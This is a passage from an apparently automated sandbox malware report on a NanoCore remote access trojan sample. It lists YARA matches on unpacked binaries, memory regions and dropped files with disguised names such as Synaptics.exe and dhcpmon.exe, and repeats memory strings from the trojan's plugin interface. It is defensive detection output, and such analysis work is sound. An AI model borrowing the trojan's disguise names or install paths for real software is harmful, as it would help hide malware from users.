            Source: Yara match, File source: 4.0.y8kdmHi6x3.exe.584130.22.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 21.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 19.2.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 23.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 11.2.._cache_WINDOWS.EXE.59e4629.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.0.Synaptics.exe.4b8e54.34.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.2.y8kdmHi6x3.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 12.2.Synaptics.exe.46d40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 15.2.Synaptics.exe.4eb40a4.6.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 23.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.0.Synaptics.exe.400000.26.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 23.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.0.Synaptics.exe.584130.32.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 19.2.dhcpmon.exe.461ebcc.2.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 9.2.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.y8kdmHi6x3.exe.45f40a4.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 8.2.Synaptics.exe.4bba750.4.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 23.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 11.2.._cache_WINDOWS.EXE.3bdebcc.4.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 23.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 23.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.0.y8kdmHi6x3.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 9.0.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 23.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.0.Synaptics.exe.4c4d1c.18.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 12.2.Synaptics.exe.46dff6c.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 15.2.Synaptics.exe.4ebff6c.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 21.0.Synaptics.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.0.y8kdmHi6x3.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 21.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.0.y8kdmHi6x3.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 20.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 15.2.Synaptics.exe.4eb40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 15.2.Synaptics.exe.4dba750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 8.2.Synaptics.exe.4bba750.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000013.00000002.380515314.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
            Source: Yara match, File source: 0000001F.00000000.406005434.0000000000832000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara match, File source: 00000018.00000002.401049585.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara match, File source: 00000010.00000000.349954370.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara match, File source: 00000027.00000000.430706138.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
            Source: Yara match, File source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000B.00000002.562480973.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000001A.00000002.412834234.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara match, File source: 00000022.00000000.415586772.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara match, File source: 00000018.00000000.392435877.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara match, File source: 00000023.00000000.420990382.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara match, File source: 00000013.00000000.356343368.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
            Source: Yara match, File source: 00000022.00000002.439856260.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara match, File source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000023.00000002.431447633.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000B.00000002.561753594.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000000.329629304.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara match, File source: 00000028.00000002.460036376.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.441301976.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000000.439738650.00000000008E2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.417653653.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.381330192.00000000045D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.558823372.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.422157438.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.441431426.0000000003711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.384287270.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.526679054.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.400361614.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000000.400197509.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000000.334103669.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.376096056.0000000004331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.436004480.0000000000832000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.459917090.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.406913050.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.429485363.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.374769254.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.443173289.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.459034432.00000000008E2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.441940953.0000000004711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.401818941.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.440103209.0000000003F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.329527934.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.375988189.0000000003331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.381281938.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.439646112.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000000.405483096.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: y8kdmHi6x3.exe PID: 5268, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: y8kdmHi6x3.exe PID: 4844, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ._cache_y8kdmHi6x3.exe PID: 6232, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WINDOWS.EXE PID: 7016, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ._cache_WINDOWS.EXE PID: 6580, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 4928, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6632, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ._cache_WINDOWS.EXE PID: 6692, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 5244, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5684, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 4964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5976, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, type: DROPPED
            Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\WINDOWS.EXE, type: DROPPED
            Source: Yara matchFile source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_Synaptics.exe, type: DROPPED

            Remote Access Functionality

            Source: y8kdmHi6x3.exe, 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: y8kdmHi6x3.exe, 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: ._cache_y8kdmHi6x3.exe, 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: Synaptics.exe, 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: WINDOWS.EXE, 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: ._cache_WINDOWS.EXE, 0000000B.00000002.562480973.00000000059E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: ._cache_WINDOWS.EXE, 0000000B.00000002.561753594.0000000003BD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: ._cache_WINDOWS.EXE, 0000000B.00000002.561753594.0000000003BD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
            Source: ._cache_WINDOWS.EXE, 0000000B.00000002.558823372.00000000005B2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: ._cache_WINDOWS.EXE, 0000000B.00000002.562031611.0000000004F70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: ._cache_WINDOWS.EXE, 0000000B.00000002.562031611.0000000004F70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
            Source: ._cache_WINDOWS.EXE, 0000000B.00000002.560829147.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: ._cache_WINDOWS.EXE, 0000000B.00000002.560829147.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
            Source: Synaptics.exe, 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: Synaptics.exe, 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: ._cache_WINDOWS.EXE, 00000010.00000000.349954370.0000000000D72000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: ._cache_WINDOWS.EXE, 00000010.00000002.376096056.0000000004331000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: ._cache_WINDOWS.EXE, 00000010.00000002.376096056.0000000004331000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
            Source: ._cache_WINDOWS.EXE, 00000010.00000002.375988189.0000000003331000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: ._cache_WINDOWS.EXE, 00000010.00000002.375988189.0000000003331000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
            Source: dhcpmon.exe, 00000013.00000002.380515314.0000000000E22000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: dhcpmon.exe, 00000013.00000002.381330192.00000000045D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
            Source: dhcpmon.exe, 00000013.00000002.381330192.00000000045D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientU